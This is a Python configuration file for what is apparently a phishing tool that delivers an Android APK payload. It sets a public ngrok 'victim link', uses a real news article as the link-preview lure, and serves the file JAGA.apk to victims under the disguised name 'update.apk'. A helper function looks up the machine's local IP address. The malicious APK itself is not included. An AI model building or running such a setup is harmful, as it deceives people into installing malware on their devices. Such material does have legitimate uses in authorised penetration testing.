"""
Dynamic Configuration - Auto-generated by run.py
Generated: 2026-07-18 21:38:23
Platform: Linux
"""

import socket
import subprocess
import platform

def get_local_ip():
    """Get local IP address (cross-platform: Linux, Windows, macOS)"""
    try:
        os_name = platform.system().lower()
        if os_name == "linux":
            result = subprocess.run(
                ["ip", "-4", "addr", "show", "scope", "global"],
                capture_output=True, text=True, timeout=3
            )
            for line in result.stdout.splitlines():
                if "inet " in line and "192.168" in line:
                    return line.strip().split()[1].split("/")[0]
        elif os_name == "windows":
            result = subprocess.run(
                ["ipconfig"],
                capture_output=True, text=True, timeout=3
            )
            for line in result.stdout.splitlines():
                if "IPv4" in line and "192.168" in line:
                    return line.split(":")[1].strip()
        elif os_name == "darwin":  # macOS
            result = subprocess.run(
                ["ifconfig"],
                capture_output=True, text=True, timeout=3
            )
            for line in result.stdout.splitlines():
                if "inet " in line and "192.168" in line and "netmask" in line:
                    return line.strip().split()[1]
    except Exception:
        pass
    return "127.0.0.1"

# Server Configuration
LOCAL_IP = "192.168.100.10"
PORT = 8081
HOST = "0.0.0.0"

# Public URL for victim link
PUBLIC_URL = "https://331a-104-28-159-128.ngrok-free.app"

# Target URL for OG preview
TARGET_URL = "https://news.detik.com/internasional/d-8579886/gedung-putih-bela-argentina-soal-spanduk-malvinas-di-piala-dunia"
DEFAULT_VIDEO_ID = "https%3A%2F%2Fnews.detik.com%2Finternasional%2Fd-8579886%2Fgedung-putih-bela-argentina-soal-spanduk-malvinas-di-piala-dunia"

# Payload Configuration
PAYLOAD_FILE = "JAGA.apk"
PAYLOAD_MIME = "application/vnd.android.package-archive"
PAYLOAD_PATH = "/home/h3llo/Documents/0x-lab/Mobile-Pentest/JAGA.apk"

# Download filename for victim
DOWNLOAD_NAME = "update.apk"

# Custom OG tags (empty = auto-fetch from target URL)
CUSTOM_TITLE = ""
CUSTOM_DESCRIPTION = ""
